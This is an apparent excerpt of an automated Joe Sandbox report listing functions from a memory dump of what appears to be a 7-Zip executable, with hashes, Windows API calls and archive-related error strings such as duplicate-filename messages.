                                                                                                                                                                                                                                • Instruction ID: 85c5d9ca17ce7696baeaa77ea865c79ee6070c1c29b2714bb988e1146207aec9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14023A3322868297DB10DF35E4943EE77A2F7B4788F445012EE4947769EB78CA99CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.MSVCRT ref: 0020FAAC
                                                                                                                                                                                                                                • free.MSVCRT ref: 0020FAC0
                                                                                                                                                                                                                                • free.MSVCRT ref: 0020FC43
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                  • Part of subcall function 0020F820: _CxxThrowException.MSVCRT ref: 0020F88D
                                                                                                                                                                                                                                • free.MSVCRT ref: 00210031
                                                                                                                                                                                                                                  • Part of subcall function 0020F8B8: memmove.MSVCRT ref: 0020F91E
                                                                                                                                                                                                                                  • Part of subcall function 0020F8B8: free.MSVCRT ref: 0020F926
                                                                                                                                                                                                                                  • Part of subcall function 0020F93C: memmove.MSVCRT ref: 0020F992
                                                                                                                                                                                                                                  • Part of subcall function 0020F93C: free.MSVCRT ref: 0020F99A
                                                                                                                                                                                                                                • free.MSVCRT ref: 002100EA
                                                                                                                                                                                                                                • free.MSVCRT ref: 002100F2
                                                                                                                                                                                                                                • free.MSVCRT ref: 00210101
                                                                                                                                                                                                                                • free.MSVCRT ref: 0021010A
                                                                                                                                                                                                                                • free.MSVCRT ref: 00210113
                                                                                                                                                                                                                                • free.MSVCRT ref: 00210121
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00210184
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Internal file name collision (file on disk, file in archive):, xrefs: 0021015D
                                                                                                                                                                                                                                • Duplicate filename in archive:, xrefs: 00210149
                                                                                                                                                                                                                                • Duplicate filename on disk:, xrefs: 0020FCB4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                                                                                                                • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                                                                                                                • API String ID: 3338823681-819937569
                                                                                                                                                                                                                                • Opcode ID: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                                                • Instruction ID: 8016895cf264cb59a6c5947cd4043450ed88508840d8c9ddae35aa7f6cebf50f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF129E7322878587C760DF19E58065EB7A1F389B90F504626EF9A47F99CB78D8A1CF00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                                                • Instruction ID: c3bee6eb45527431f4d63802df7538a5174e8b6a25b847999cfb8bc682e207e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99024632209EC186DA24DF66E4903AFB361FBD5B84F548126DB8E57B69DF39C845CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 001D8F7A
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 001D905E
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 001D90B5
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 001D90F6
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetModuleHandleW.KERNEL32 ref: 001DABD1
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetProcAddress.KERNEL32 ref: 001DABE1
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetDiskFreeSpaceW.KERNEL32 ref: 001DAC32
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                • String ID: ($:
                                                                                                                                                                                                                                • API String ID: 4250411929-4277925470
                                                                                                                                                                                                                                • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                                                • Instruction ID: 23fd458b1f1d2704848bea5f4cb2fc99f10ede4124164391717988e375f80ec8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6351BD33608BC196CB30DF20F05079EB765F388764F548526EB9A47B58EB38C498CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$DriveLogicalStrings
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 837055893-0
                                                                                                                                                                                                                                • Opcode ID: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                                                • Instruction ID: 5187df8b829c5db79b1990295678a09cb9e9f440e60a0de5fe71e5ae50c8133f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A031C423701B4155DA34EF26E96536A6361BB95BE8F8C8236DEAE47384DF38C946C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D96D1
                                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 001D9723
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 001D976C
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D9779
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D9796
                                                                                                                                                                                                                                • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 001D97C4
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D97CD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2572579059-0
                                                                                                                                                                                                                                • Opcode ID: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                                                • Instruction ID: fb1069725854d7f4c0eaa56699e66154798d649f9d7c5e9f56c6ec006006b0dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56317332215A40CAC6309F16F95076AB764E7A6BE0F588222EBFD47B95DF3DC4918B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Version$AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 2268189529-2102062458
                                                                                                                                                                                                                                • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                                                • Instruction ID: 311efc73a52d466afbd70ce771192980f859a43556501eb89350ba3b44df3b8f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F05834218A42C2EF70DF50F8483E923A0FBA8709F850225C65E012B4EF7CC68CCB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1197914913-1127948838
                                                                                                                                                                                                                                • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                • Instruction ID: 7f3dc366e1f9f9a0c426f6cc77a9b30cd55ff6ed40c454f364b4ee0e1107ad55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B711643231AB4696DA50CF55F484B9AB364F7A4B80F449022EB9E03728EF38C559CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32 ref: 001DB12A
                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 001DB13E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                • API String ID: 1748579591-1553575800
                                                                                                                                                                                                                                • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                • Instruction ID: df8a8ad1ea774c17732788aba794100aae41e7eb98cc1b5566abc30e2f6f747c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22519A93B082C08BD719CB3DD846BCDBFC1E3A5758F08822ADB5687785E66DC50AC721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001DB5B8: GetCurrentProcess.KERNEL32 ref: 001DB5C2
                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32 ref: 001DB624
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentInfoProcessSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1098911721-0
                                                                                                                                                                                                                                • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                • Instruction ID: 2fb6c6dc13994bfbd2633515a1bdfb6ee60ae17924a0d4416b062aa2d5b433f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12E01266628494C3CB70DB18E5C2769A361F7A4B85FD15612E68B82F14DF2DC654CF00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                                                                                                                                                                                • Instruction ID: 34afeae6880bda907862fecc5a575742f80bca13212b8b6d580c827bd778b7ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09C001FA2197408B874A8F2EA850818BBA0F788B907868029AA0CD3300E2358444CF24
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                                                • Instruction ID: b6924ba1278b0a6c7f0a45586ae67baa5c656950e1b2f4a4407fdefc8a4368bd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3D1F12225958491CA20FF75E49166FA730F7E2780F549153FBAE93B2ACF38D846CB14
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                                                • Instruction ID: e62cc36087298c40d2019d3a959f795923b7ed37948e24f4b35b6ad83a2cdca8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E913A22215B8486CB24EF36D064A6E6760F7EBF85F0AA463DB5E53711CF38D44AC714
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                                                                                • Opcode ID: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                                                • Instruction ID: 10293a9953202a41f41496d2b89d5d62ae59477ff9b1d2b3358e9cfbf9ba6bfa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7E1B23370869486CB30EE16E4811AEA760F3A6BD0F494126EFAD57B19CF78D886C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                                                                                                                • API String ID: 3957182552-3922825594
                                                                                                                                                                                                                                • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                • Instruction ID: 6defc57a7e31e74ff4d5f97028a3179a7870430e491aa7820bf0c66f8956f637
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A81A3226149C492CB21EF16D8907AE7330F7E9B84F458123EB9E47769CF78C986C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                                                                                                                • String ID: Empty file path
                                                                                                                                                                                                                                • API String ID: 462375450-1562447899
                                                                                                                                                                                                                                • Opcode ID: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                                                • Instruction ID: b506dc983897a2b1855f0f3c065fb7c26f7cb10878e7230488cc68f3e5bba06b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98D19233214AC086CB20EF25E4903AEB762F7A5794F544127EFAA57B69DF38C945CB40
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
